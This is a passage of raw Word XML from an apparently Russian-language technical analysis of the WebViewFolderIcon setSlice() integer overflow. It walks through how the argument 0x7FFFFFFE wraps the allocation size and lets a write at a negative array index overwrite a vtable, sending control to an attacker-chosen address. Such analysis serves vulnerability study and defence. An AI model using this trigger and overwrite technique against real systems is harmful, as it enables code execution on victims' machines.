          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">array </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">should </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>be</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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">incremented, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="193"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="196"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">DSA </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="196"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>enlarged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="530"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="540"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="201"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="202"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">typedef </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="209"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">DSA </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>*HDSA;</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Конструктор </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вызывает метод </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DSA_Create(), </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>передавая в качестве параметров следующие значения:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">cbItem </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">= 16; </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">cItemGrow </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>= 2;</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Переполнение буфера происходит непосредственно в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DSA. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Последовательность действий, инициирующих переполнение, следующая:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="716"/>
        </w:tabs>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Передача значения </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0x7FFFFFFE </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в метод </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderIcon.setSlice() </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в качестве первого аргумента:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web ViewFolderIcon. setSlice(0x 7FFFFFFE,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>..,..)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Инициализация значения индекса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DSA </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новым значением:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">idxItem </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0x7FFFFFFE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рассчет нового количества элементов в массиве:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">cItemsNew </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; = </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>idxItem + cItemGrow = 0x7FFFFFFE + 2 = 0x80000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рассчет нового размера памяти:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>MemorySize &lt;= cItemsNew</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="620"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(cbItem=16) = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запись нового элемента в массив по адресу:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>idxAddress = idxItem</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="620"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>cbItem = 0x7FFFFFFE</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="620"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">16 = 0xFFFFFFE0 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.что равносильно:</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5"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>DSAArray[-32]</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Запись данных по отрицательному значению индексу массива приведет к затиранию данных в, предшествующих массиву данных, блоках памяти. В нашем случае таблица виртуальных методов класса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AmbientFont, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">где содержаться адреса функций </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="551"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ClearClass()</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="551"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ClearClassAndObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>().</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Таким образом, при вызове деструктора для объекта класса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="551"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WebViewFolderIcon</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">управление будет передано по адресу, указанному злоумышленником при вызове метода </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="551"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setSlice</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>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7"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="208"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
